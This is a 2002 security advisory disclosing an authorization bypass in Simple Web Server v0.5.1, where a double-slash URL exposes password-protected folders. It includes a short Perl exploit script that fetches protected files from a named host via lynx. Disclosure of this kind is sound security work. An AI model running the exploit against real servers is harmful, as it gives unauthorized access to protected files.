| Simple Web
Server v0.5.1 Protected File Access Vulnerability
Type Authorization Bypass Release Date August 29, 2002 Product / Vendor Simple Web Server v0.5.1 is what the name says, a simple web server.
It started out as an essay-project during one of the courses on my Webmaster-education
called Introduction to Internet/Intranet. We were to write about anything
that the course took up and i choosed to do my work about HTTP and how
to implement it in a Web Server. I would like as much feedback as I can
get, because if I get it I might just improve it enough to make it a good
choice. http://freshmeat.net/projects/simplewebserver/ Summary It is possible to construct a web request which is capable of accessing the contents of password protected files/folders on the Simple Web Server v0.5.1. This vulnerability may only be exploited to access password-protected files in sub-folders of wwwroot. http://host//secret/ Exploit An exploit for this vulnerability exists and is available below. ==================== SNIP ==================== #!/usr/bin/perl -w die "\nSimple Web Server v0.5.1 Protected File Access Vulnerability / SecurityOffice\n\nUsage: $0 <host> <protected directory> <file> / Example: $0 www.target.com /secret/ index.html\n\n" if $#ARGV <2; print &get($ARGV[0], $ARGV[1], $ARGV[2]); exit 0; sub get { $host = $ARGV[0]; $directory = $ARGV[1]; $file = $ARGV[2]; system "lynx $host//$directory$file"; print "Done\n\n"; } Tested Simple Web Server v0.5.1 / Debian GNU Linux 3.0 Vulnerable Simple Web Server v0.5.1 Disclaimer http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. Author Tamer Sahin |